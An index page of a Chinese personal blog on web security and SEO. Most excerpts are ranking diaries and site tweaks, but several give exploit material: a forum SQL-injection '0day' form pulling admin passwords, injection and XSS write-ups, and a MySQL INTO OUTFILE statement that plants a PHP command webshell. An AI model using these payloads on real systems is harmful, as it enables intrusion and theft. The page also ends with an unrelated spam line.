河北網絡安全博客

河北博客是一個關注網絡安全、網站設計、網站推廣、網站優化SEO、網站建設的河北地方博客。


[置頂] 關于河北博客【想了解河北博客的朋友請看這里】

[置頂] 站長朋友請看這里【永久置頂】

【伯樂網征文】一個菜鳥站長的三年站長圈生活

diary

        我是2008年初開始走進站長這個圈子的,當時看著朋友們都在做網站,做程序,我也有點動心,想搞一個自己的小網站,因為這方面的基礎有些欠缺,就用z-blog搭建了幾個博客練手,發些文章,去朋友的博客留言回復,積攢了一些人氣。

站長日常工作必備的十張記錄單

diary

  目前站長行業里的基本情況是大家各自單打獨斗,所謂“個人站長”很大程度上說明這個群體的生存狀態:獨立,個體,尚無團隊。在這種狀況下,日常工作的條理性顯得非常重要,然而,對于龐大的網站工程來說,我們需要做的事情實在是太多太多,難免會有很多疏忽,俗話說好記性不如爛筆頭,做好各項工作的記錄就顯得尤為重要,它能夠讓站長的工作更加實用化,具體化,系統化,最大化提高工作效率。以下是站長必備的十項記錄單:

河北安全博客加入新城網鏈接

diary

        新城網,http://www.0311.com.cn,石家莊本地門戶網站,0311是河北石家莊的區號。以下是新城網簡介

建站吧關鍵字優化(一)

diary

   今年五一是第二次去女朋友家了,去年五一時第一次去的,時間過的真的很快,轉眼一年,走的時候,希望建站吧河北安全博客回來時能給我個驚喜,今天回來,果然!呵呵,google關鍵字“建站吧”已經是第一位了。百度的關鍵字“建站吧”排在第二頁第一位,不過收錄的是走時剛剛加上的廣告服務單頁面,不過也不錯了。滿意!截圖留念吧

河北安全博客關鍵字優化(一)

diary

河北安全博客關鍵字“河北博客”今天帶來很多IP。我詳細查看了一下,截圖如下:在google搜索“河北博客”排名第三在百度搜索關鍵字“河北博客”網站排名第四 。

去除hdwiki“此詞條來自互動百科聯盟,詳情請查閱XX”

diary

每個詞條下面都有“此詞條來自互動百科,詳情請查閱:XXX”在根目錄找到control文件夾在里面找到doc.php文件把doc.php下的eval($this->plugin['hdapi']['hooks']['uniontitle']);刪掉 演示網站:建站百科

28句話讓你的人際關系更上一層樓

diary

1.長相不令人討厭,如果長得不好,就讓自己有才氣;如果才氣也沒有,那就總是微笑。
2.氣質是關鍵。如果時尚學不好,寧愿純樸。
3.與人握手時,可多握一會兒。真誠是寶。

飛天論壇asp版通殺 0day利用程序(官方漏洞未補)

buger

Copy code<center><H1>飛天論壇asp版通殺 0day利用程序</H1></center><form  method=post name="luoye">目標地址:<input name="act" type="text" id="act" size="140" value="http://www.nfwwds.tw"><br><br>注入語句:<input type=text size=150 name=userid value="1 and 1=2 union select 1,2,admin_pwd,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,

...

Bo-Blog 2.0.3 注射漏洞

buger

//inc/mod_tag.php   
  
------------------------   
if (!defined('VALIDREQUEST')) die ('Access Denied.');   
  
if (!$job) $job='default';   
...

PJBlog注入漏洞

buger

影響版本:PJBlog 3.0.6.170
程序介紹:
PJBlog一套開源免費的中文個人博客系統程序,采用asp+Access的技術,具有相當高的運作效能以及更新率,也支持目前Blog所使用的新技術。


漏洞分析:
在文件class/cls_logAction.asp中:

oldcate=request.form("oldcate") //第429行
oldctype=request.form("oldtype")

...

windowsXPsp3IIS下載

windows

         windows環境:xp sp3

         iis版本:5.1 可升級至6.0但為英文版,5.1為虛擬目錄操作

         附加:sql2000個人版安裝即可在XP下使用

        測試結果:完全通過

...

“河北博客”關鍵詞百度排名第一!

diary

   老習慣,看看今天的流量,今天的搜索引擎,今天的關鍵詞。

   發現“河北博客”關鍵詞,我就點開看看吧。。。   居然是第一位!

QQ校友XSS 0day及利用

buger

漏洞一:

qq校友 班級共享硬盤 上傳文件時對文件描述沒有做任何過濾,導致XSS。

qq校友使用了Ajax技術,來顯示文件列表。在文件Msharemsg.js中使用innerHTML輸出文件列表的HTML代碼。由于使用了innerHTML,所以直接插入代碼: <script>alert('kingwq')</script>不會被執行。使用下面的格式既可:<script defer>alert('kingwq')</script>。加入defer屬性,那么瀏覽器在下載腳本的時候就不會立即對其進行處理,而是繼續對頁面進行下載和解析。這樣我們插入的JavaScript就能正常運行。

...

運用Mysql語句生成后門具體方法

diary

通過MySQL(和PHP搭配之最佳組合) 的語句生成后門木馬的方法:

SELECT * FROM `vbb_strikes` WHERE 1 union select
2,3,0x3C3F7068702073797374656D28245F52455155455
3545B636D645D293B3F3E
from vbb_strikes into outfile 'c:/inetpub/wwwroot/cmd.php'

  通過MySQL(和PHP搭配之最佳組合) 的注入或者在 phpmyadmin 里運行以上語句,則會C:/inetpub/wwwroot/下生成 cmd.php 文件,內容為原來的 vbb_strikes 內容,后面緊跟著:

...

Windows 7又曝新漏洞 可導致系統崩潰

buger

微軟觀察家Mary-Jo Foley今天在其博客中表示,眾多Windows 7測試者近日發現Windows 7的一個漏洞,當他們使用微軟的MSI安裝程序啟動Windows更新或安裝任何軟件時,發現系統將發生崩潰。不過眾多測試者已經找到了修復該問題的辦法。
  
    測試者Chris Holmes在博客中寫到,當使用一個基于MSI的安裝包時,許多用戶發現explorer.exe和msiexec.exe都有可能出現問題。該漏洞有時候使用戶不得不重新格式化硬盤后重新安裝系統。
...

博客改版上線

diary

     今天把博客從新修改了,畢竟是剛從沙盒出來,GG收錄減少了近3倍。

這是一個嶄新的開始!   歡迎大家光臨!

sougou跨站漏洞

buger

跨站頁面:http://bbs.sogou.com/

選中帖子搜索,在搜索框輸入跨轉語句

給出兩個例子

<script>alert('test')</script> 


<iframe src=http://www.nfwwds.tw/></iframe>

重復標題問題解決

diary

    在月份歸檔處總是出現重復的標題標記,搜索了N多也未解決

    只有自己研究了

   現在給大家說一下修改方法,具體代碼參照

只能catalog.html及其相關模板中引用

...

標簽

都是插件惹的禍

diary

       一直無法實現靜態頁面生成分頁目錄顯示。原來是插件titleSEO在搞鬼。

         停用! 這次問題解決了!

恭喜本站進入GG沙盒

diary

先汗一個

昨天晚上照例檢查流量,發現流量驟小,從而還是按照習慣,GG搜索kingwq進入博客,發現居然在第一位消失了,到了第二頁第一位,也就是第11位了,從而又急site:www.nfwwds.tw正常收錄,有點意思了,這是為什么呢?

GG一番搜索,得出結論,本站順利進入GG沙盒!

GG沙盒是什么東東?先來隆重介紹一下!

...

這是為什么呢?

diary

    剛打開博客一看,老習慣,GG,單搜kingwq

    沒了!再一翻,跑第二頁了,拉風的石家莊安全博客也不存在了,趕緊查了下PR,沒變。。。

   太晚了,明天再看看到底這是為什么

分頁:1[2][3][4]

訂閱河北博客

  • 訂閱我的博客:訂閱我的博客
  • 關注新浪微博:關注新浪微博
  • 關注騰訊微博:關注騰訊微博
  • google reader
  • 鮮果
  • 抓蝦
  • QQ邮箱

河北博客站內搜索

河北博客相關鏈接

河北博客熱文排行

Powered By kingwq's blog

本站采用創作共用版權協議, 要求署名、非商業用途和保持一致. 轉載本站內容必須也遵循“署名-非商業用途-保持一致”的創作共用協議.
This site is licensed under a Creative Commons Attribution-NonCommercial-ShareAlike 2.5 License.冀ICP備09002514號.Copyright www.nfwwds.tw.2010

云南快乐十分走势图基本走势图百度